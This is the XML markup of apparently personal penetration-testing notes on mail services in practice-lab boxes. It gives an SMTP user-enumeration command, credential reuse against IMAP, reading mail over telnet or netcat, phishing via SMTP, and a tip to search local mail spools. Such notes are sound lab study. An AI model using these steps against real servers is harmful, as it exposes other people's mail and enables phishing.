      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Analogy: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Like reading your mail directly at the post office — you leave it there, organize it into boxes, but don’t have to take it all home.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000286B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000286C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000286D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000286E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000286F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId843">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Postfish</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice also has good smtp user enumeration and reading emails and sending phishing email using SMTP. They logged into POP3. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002870">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002871">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:hyperlink r:id="rId844">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Hepet</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice does some good enumeration for SMTP and IMAP since it was a phishing attack:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002872">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1348"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">smtp-user-enum -M VRFY -U users.txt -t 192.168.134.140</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002873">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1348"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They then used the creds they found here to enumerate IMAP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002874">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1348"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2997200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="25" name="image19.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image19.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId84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2875">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002876">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_4hr2y9luauks" w:id="353"/>
      <w:bookmarkEnd w:id="353"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is a guide below on how to read mail (via IMAP port 143) using telnet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002877">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1348"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4852988" cy="3582742"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="366" name="image354.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image354.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId846"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4852988" cy="3582742"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002878">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1348"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5043488" cy="3248872"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="551" name="image532.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image532.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId847"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5043488" cy="3248872"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002879">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1348"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4764571" cy="4214813"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="214" name="image210.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image210.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId848"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4764571" cy="4214813"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000287A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1348"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5099050" cy="3824288"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="150" name="image150.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image150.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId849"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="50990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287B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000287C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="539"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This other </w:t>
      </w:r>
      <w:hyperlink r:id="rId850">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Hepet</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:hyperlink r:id="rId851">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">original</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Writeup also does a lot of enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000287D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="539"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They use netcat to read mail instead</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000287E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000287F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Postfish PG Practice</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a really hard box but it's all about interacting with POP3, IMAP, and SMTP. It even teaches us how to use tools to enumerate each one, as well as sending mail using telnet/nc and interacting with the raw ports using telnet. They logged into POP3. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002880">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002881">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here are two good writeups:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002882">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="394"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">More concise: </w:t>
      </w:r>
      <w:hyperlink r:id="rId852">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/linux/postfish</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002883">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="394"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Longer but goes into more-depth: </w:t>
      </w:r>
      <w:hyperlink r:id="rId853">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://medium.com/@whitebearr82/pgpractice-linux-postfish-192-168-56-137-9a48d8577c5f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2884">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002885">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002886">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002887">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000288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89">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000288A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_gp34kouyt0eh" w:id="354"/>
      <w:bookmarkEnd w:id="354"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mail</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000288B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000288C">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Just a tip: If you see port 25 or SMTP on the target, always look through /var/mail/ and /var/spool/mail.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000288D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="572"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd /var/mail</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000288E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="572"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd /var/spool/mail</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000288F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="572"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This was seen in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId854">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Scrutiny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890">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002891">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you see "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You have mail</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" when you SSH into an account, here's what to do.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002892">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002893">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
